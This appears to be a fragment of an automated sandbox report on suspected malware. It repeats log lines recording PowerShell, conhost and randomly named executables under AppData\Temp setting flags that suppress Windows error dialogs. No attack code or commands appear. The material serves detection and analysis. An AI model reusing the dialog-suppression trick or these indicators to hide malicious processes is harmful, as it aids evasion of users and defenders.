Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1006042001\ea44ea94c2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1006042001\ea44ea94c2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1006042001\ea44ea94c2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1006042001\ea44ea94c2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1006042001\ea44ea94c2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1006042001\ea44ea94c2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1006042001\ea44ea94c2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1006042001\ea44ea94c2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1006042001\ea44ea94c2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1006042001\ea44ea94c2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1006042001\ea44ea94c2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1006042001\ea44ea94c2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1006042001\ea44ea94c2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1006042001\ea44ea94c2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1006042001\ea44ea94c2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1006042001\ea44ea94c2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1006042001\ea44ea94c2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1006042001\ea44ea94c2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1006042001\ea44ea94c2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1006042001\ea44ea94c2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1006042001\ea44ea94c2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1006042001\ea44ea94c2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1006042001\ea44ea94c2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1006042001\ea44ea94c2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1006042001\ea44ea94c2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1006042001\ea44ea94c2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1006042001\ea44ea94c2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1006042001\ea44ea94c2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1006042001\ea44ea94c2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1006042001\ea44ea94c2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1006042001\ea44ea94c2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1006042001\ea44ea94c2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
